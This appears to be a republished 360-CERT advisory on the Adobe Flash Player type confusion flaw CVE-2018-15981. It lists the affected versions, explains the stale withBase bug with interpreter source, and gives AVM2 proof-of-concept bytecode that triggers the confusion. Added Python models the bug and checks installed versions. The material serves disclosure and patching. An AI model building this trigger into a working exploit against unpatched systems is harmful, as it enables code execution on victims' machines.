2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 06/01 Report
This article explains the early warning for the Adobe Flash Player arbitrary code execution vulnerability CVE-2018-15981. Many newcomers are not clear about it, so to help readers understand the problem the editor explains it in detail below; anyone who needs this can follow along, and I hope you gain something from it.
0x00 event background
Late last night, Adobe released an Adobe Flash Player security update for Windows, macOS, Linux and Chrome OS, patching a type confusion vulnerability (CVE-2018-15981). The vulnerability affects Adobe Flash Player 31.0.0.148 and earlier versions, and successful exploitation could lead to arbitrary code execution. Based on its analysis of the vulnerability, 360-CERT believes that it is not difficult to exploit, affects a wide range of users and is seriously harmful.
0x01 affected scope

Product                                                         Version                          Platform
Adobe Flash Player Desktop Runtime                              31.0.0.148 and earlier versions  Windows, macOS and Linux
Adobe Flash Player for Google Chrome                            31.0.0.148 and earlier versions  Windows, macOS, Linux and Chrome OS
Adobe Flash Player for Microsoft Edge and Internet Explorer 11  31.0.0.148 and earlier versions  Windows 10 and 8.1

0x02 vulnerability analysis
The vulnerability lies in the file Interpreter.cpp: when handling an exception, Flash resets many variables of the interpreter's state machine and sets the interpreter's PC to the address of the target handler. This reset is over-optimized, however, and does not reset the with-scope variable (withBase). An attacker can construct a malicious Flash file that throws an exception after an object has been loaded, so that a member variable of that object is subsequently accessed under a different type, resulting in type confusion.
In the Interpreter.cpp source, a withBase variable is defined and used as an offset pointer into the scopeBase array:
register Atom* const scopeBase = framep + ms->local_count();
register Atom* volatile withBase = NULL;
NONDEBUGGER_ONLY(register) int volatile scopeDepth = 0;
register ScopeChain* const scope = env->scope();
This variable is passed to the handler of the findproperty instruction:
INSTR(findproperty) {
    b1 = false;
findproperty_impl:
    SAVE_EXPC;
    GET_MULTINAME_PTR(multiname, U30ARG);
    if (multiname->isRuntime())
    {
        aux_memory->multiname2 = *multiname;
        sp = initMultiname(env, aux_memory->multiname2, sp);
        multiname = &aux_memory->multiname2;
    }
    *(++sp) = env->findproperty(scope, scopeBase, scopeDepth, multiname, b1, withBase);
    NEXT;
}
Therefore, the stale withBase can be reached through the findproperty instruction. The PoC used in the analysis is the following AVM2 bytecode:
getlocal0
pushscope
getlocal0
findpropstrict QName(PackageNamespace(""), "NewClass2")
constructprop QName(PackageNamespace(""), "NewClass2"), 0
initproperty QName(PackageInternalNs(""), "myvar")
getlocal0
pushwith
L10:
pushbyte 1
throw
L12:
nop
L16:
getlocal0
pushscope
pushint 534568
newobject 1
coerce QName(PackageNamespace(""), "Object")
pushscope
findproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])
getproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])
getslot 1
returnvoid
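To make the mechanism behind the PoC concrete, here is an added toy model of the interpreter's scope stack. It is illustrative code written for this page, not Adobe/avmplus source and not the 360-CERT PoC; the class names (Interp, ScriptObject, NewClass2), the slot value and the plain object carrying a dynamic "myvar" property are all constructed. The only details taken from the advisory are the roles of scopeBase, scopeDepth and withBase, the fact that exception dispatch unwinds the scope stack without clearing withBase, and the order of operations in the PoC. The `fixed` flag models the natural remedy, resetting withBase during exception dispatch, which is an assumption of the model rather than a quote of Adobe's patch.

```python
# Added illustration (not avmplus/Adobe code, not the 360-CERT PoC): a toy
# model of the AVM2 scope stack showing why a withBase that survives exception
# dispatch makes findproperty resolve a name against the wrong object.
# All names and values below are invented for the example.


class ScriptObject:
    """Minimal script object. 'traits' are declared members the verifier can
    reason about statically; 'props' are dynamic properties, which only a
    with-scope lookup (or getproperty) can see."""

    def __init__(self, traits=(), props=None):
        self.traits = set(traits)
        self.props = dict(props or {})

    def getproperty(self, name):
        return self.props[name]


class NewClass2(ScriptObject):
    """Stand-in for the PoC's typed class; slot 1 is a real, typed slot."""

    def __init__(self):
        super().__init__()
        self.slots = {1: "slot-1 value"}  # constructed slot content


class Interp:
    """Models scopeBase / scopeDepth / withBase from Interpreter.cpp."""

    def __init__(self, reset_with_base_on_exception):
        self.scope = []        # scopeBase[0 .. scopeDepth)
        self.with_base = None  # withBase; None models NULL
        self.fixed = reset_with_base_on_exception

    def pushscope(self, obj):
        self.scope.append(obj)

    def pushwith(self, obj):
        # The first with-scope records where with semantics begin.
        if self.with_base is None:
            self.with_base = len(self.scope)
        self.scope.append(obj)

    def throw_to_handler(self):
        # Exception dispatch unwinds the scope stack to the handler's depth.
        # The bug modelled here: withBase keeps pointing into the old stack.
        self.scope.clear()
        if self.fixed:              # assumed remedy: clear withBase as well
            self.with_base = None

    def findproperty(self, name):
        # Innermost scope first. Scopes at or above withBase use dynamic
        # (with) lookup; the others only consider declared traits.
        for i in range(len(self.scope) - 1, -1, -1):
            obj = self.scope[i]
            if self.with_base is not None and i >= self.with_base:
                if name in obj.props:
                    return obj
            elif name in obj.traits:
                return obj
        return self.scope[0]  # global object as the fallback


def run_scenario(fixed):
    """Replays the shape of the PoC; returns (type name, value) that
    'getproperty myvar' yields after the handler's findproperty."""
    interp = Interp(reset_with_base_on_exception=fixed)
    # The global object declares a typed member 'myvar' holding a NewClass2.
    global_obj = ScriptObject(traits={"myvar"}, props={"myvar": NewClass2()})
    interp.pushscope(global_obj)   # getlocal0; pushscope
    interp.pushwith(global_obj)    # getlocal0; pushwith  -> withBase set
    interp.throw_to_handler()      # pushbyte 1; throw    -> handler at L16
    interp.pushscope(global_obj)   # getlocal0; pushscope
    # A plain Object with a dynamic 'myvar' (constructed; the PoC builds it
    # with newobject), pushed as an ordinary scope inside the handler.
    plain = ScriptObject(props={"myvar": 534568})
    interp.pushscope(plain)        # coerce Object; pushscope
    holder = interp.findproperty("myvar")
    value = holder.getproperty("myvar")
    return type(value).__name__, value


def getslot_1(value):
    """What 'getslot 1' assumes: a NewClass2 with a slot 1. The model checks
    the type; the real interpreter trusts the verifier and just reads."""
    if not isinstance(value, NewClass2):
        raise TypeError("type confusion: getslot 1 on " + type(value).__name__)
    return value.slots[1]


def slot_read_is_confused(fixed):
    """True when the stale withBase hands getslot the wrong kind of value."""
    try:
        getslot_1(run_scenario(fixed)[1])
        return False
    except TypeError:
        return True


if __name__ == "__main__":
    print("buggy :", run_scenario(False), "confused =", slot_read_is_confused(False))
    print("fixed :", run_scenario(True)[0], "confused =", slot_read_is_confused(True))
```

With the stale withBase, the plain object pushed after the handler is treated as a with-scope, so the dynamic "myvar" (an int) shadows the typed global member the verifier assumed; clearing withBase during dispatch restores the expected resolution.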
0x03 security recommendations
The vulnerability is not difficult to exploit, affects a wide range of users and is seriously harmful. 360-CERT therefore strongly recommends that users update Adobe Flash Player.
Now that the patch has been released, users can use the "update" feature within the software, or visit https://www.flash.cn/ to download the latest version of the application.
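For administrators who need to confirm which installs fall inside the affected range from the 0x01 table (31.0.0.148 and earlier), here is an added inventory check. It is example code written for this page, not a tool from 360-CERT or Adobe; the inventory records are constructed sample data, and in practice they would come from an asset-management export. Versions are compared numerically per component, since a plain string comparison would wrongly rank "31.0.0.99" above "31.0.0.148".

```python
# Added example (not from the advisory or Adobe): flag Flash Player installs
# at 31.0.0.148 or earlier, the affected range stated in the advisory.

LAST_AFFECTED = (31, 0, 0, 148)   # from the advisory's affected-version table


def parse_version(text):
    """Turn '31.0.0.148' into a comparable tuple; raise on malformed input
    rather than silently treating it as up to date."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("unrecognised Flash Player version: %r" % text)
    return tuple(int(p) for p in parts)


def is_affected(version_text):
    """True when the version is 31.0.0.148 or earlier."""
    return parse_version(version_text) <= LAST_AFFECTED


def affected_hosts(inventory):
    """Return (host, product, version, reason) for every entry that needs
    attention; malformed versions are reported, not ignored."""
    findings = []
    for host, product, version in inventory:
        try:
            if is_affected(version):
                findings.append((host, product, version, "affected"))
        except ValueError:
            findings.append((host, product, version, "unparseable version"))
    return findings


# Constructed sample inventory (host, product, reported version).
SAMPLE_INVENTORY = [
    ("ws-01", "Adobe Flash Player Desktop Runtime", "31.0.0.148"),
    ("ws-02", "Adobe Flash Player for Google Chrome", "30.0.0.154"),
    ("ws-03", "Adobe Flash Player for Microsoft Edge and Internet Explorer 11", "32.0.0.1"),
    ("ws-04", "Adobe Flash Player Desktop Runtime", "unknown"),
    ("ws-05", "Adobe Flash Player for Google Chrome", "31.0.0.99"),
]


if __name__ == "__main__":
    for host, product, version, reason in affected_hosts(SAMPLE_INVENTORY):
        print("%-6s %-62s %-12s %s" % (host, product, version, reason))
```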